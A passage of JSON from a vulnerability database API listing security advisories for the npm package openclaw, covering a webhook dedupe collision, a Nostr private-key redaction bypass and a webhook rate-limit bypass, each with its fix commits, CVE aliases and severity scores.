ity":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerabil
ity":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35664","GHSA-77w2-crqv-cmv3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d864-qy75-c3dx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89306?format=json","vulnerability_id":"VCID-d8v2-gft5-buee","summary":"OpenClaw: Zalo replay dedupe keys could suppress messages across chats or senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates.\n\n## Impact\n\nCross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @D0ub1e-D for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41354","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.1772","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17683","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17714","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41354"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/
CVE-2026-41354","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41354"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys"},{"reference_url":"https://github.com/advisories/GHSA-rxmx-g7hr-8mx4","reference_id":"GHSA-rxmx-g7hr-8mx4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rxmx-g7hr-8mx4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCI
D-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCI
D-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41354","GHSA-rxmx-g7hr-8mx4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d8v2-gft5-buee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89082?format=json","vulnerability_id":"VCID-da47-zdf1-mfgf","summary":"## Summary\nOpenClaw Nostr privateKey config redaction bypass leaks plaintext signing key via config.get\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still models Nostr privateKey as plain string so config views can expose it, and the secret-schema fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57700d716f660591fb6e09727f3ca8041fa48b9d` — 2026-03-31T19:55:03+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @ccreater222 for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41385","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03912","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03897","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0391","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41385"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_
elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41385","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41385"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass"},{"reference_url":"https://github.com/advisories/GHSA-jjw7-3vjf-fg5j","reference_id":"GHSA-jjw7-3vjf-fg5j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements"
:""}],"url":"https://github.com/advisories/GHSA-jjw7-3vjf-fg5j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c
7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-v
kft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41385","GHSA-jjw7-3vjf-fg5j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-da47-zdf1-mfgf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91608?format=json","vulnerability_id":"VCID-dbcw-brhj-k7hs","summary":"OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n## Summary\n\nSynology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Weak Webhook Token\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSynology Chat webhook auth previously rejected invalid tokens without throttling repeated guesses, allowing brute-force attempts against weak webhook secrets. 
Commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`.\n\n## Fix Commit(s)\n\n- `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35646","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23481","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23421","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23468","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35646"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""
},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_syst
